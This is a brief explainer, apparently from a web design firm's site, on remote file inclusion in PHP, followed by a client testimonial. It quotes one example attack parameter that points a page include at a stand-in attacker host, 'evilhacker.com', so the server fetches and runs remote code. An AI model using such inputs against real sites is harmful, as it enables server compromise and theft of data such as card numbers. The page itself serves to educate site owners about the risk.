Remote Code Execution

Remote Code Execution is one of the scariest website / web application security risks. Here's how it works. Much like Cross-Site Scripting, the potential hacker sees a URL that looks enticing - something like:

“page.php?session=fdajkl5ejklad&page=about”

The attacker decides to try something like this:

“&page=http://www.evilhacker.com/phpHack.php”

If the underlying code for the website / web application is poorly written, it may actually try to “include” or execute the code hosted at http://www.evilhacker.com/phpHack.php. This code will probably include some sort of virus that is downloaded to the server and starts serving up illegal DVD's for download, or starts gathering information, like credit card numbers, and slowing down everything else in the process.

This type of attack is extremely dangerous because it can put the entire server at risk - not just one site.

The Good Word

“We have worked with Joel Post, Joe Koenig and their team at Creative Anvil since its inception and have found them to be extremely perceptive in helping us dig for our unique messaging style. They have pulled ideas from us and transformed them into an image that was just what we had in mind all along. Creative Anvil has assisted us...” Read More »

Donna Zerega
Advertising and Marketing
Prudential Alliance Realtors
St Louis, Mo

Anvil News